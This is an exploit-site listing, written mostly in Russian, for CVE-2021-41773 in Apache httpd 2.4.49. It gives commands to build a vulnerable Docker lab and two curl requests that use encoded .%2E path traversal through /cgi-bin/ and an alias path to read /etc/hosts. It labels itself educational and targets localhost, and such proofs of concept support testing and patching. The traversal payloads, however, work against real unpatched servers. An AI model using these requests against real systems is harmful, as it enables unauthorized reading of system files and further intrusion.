Sploitus

Exploit for CVE-2021-41773

kitploit · 2026-08-27

Exploit Code

MARKDOWN31 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MASAHIRO331-CVE-2021-41773
# CVE-2021-41773 (Apache httpd только 2.4.49)

Только для образовательных целей.

Смотрите раздел Reference для подробностей.

## Запуск

root@kitploit:~
    
    
    $ git clone https://github.com/masahiro331/CVE-2021-41773.git
    $ cd CVE-2021-41773
    $ docker build -t cve-2021-41773 .
    $ docker run -d -p 8080:80 cve-2021-41773
    

## Эксплуатация

root@kitploit:~
    
    
    # This vulnerability affects the use of Alias.
    $ curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
    $ curl http://localhost:8080/webpath/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
    

## Ссылки

Исправленный коммит Уведомление вендора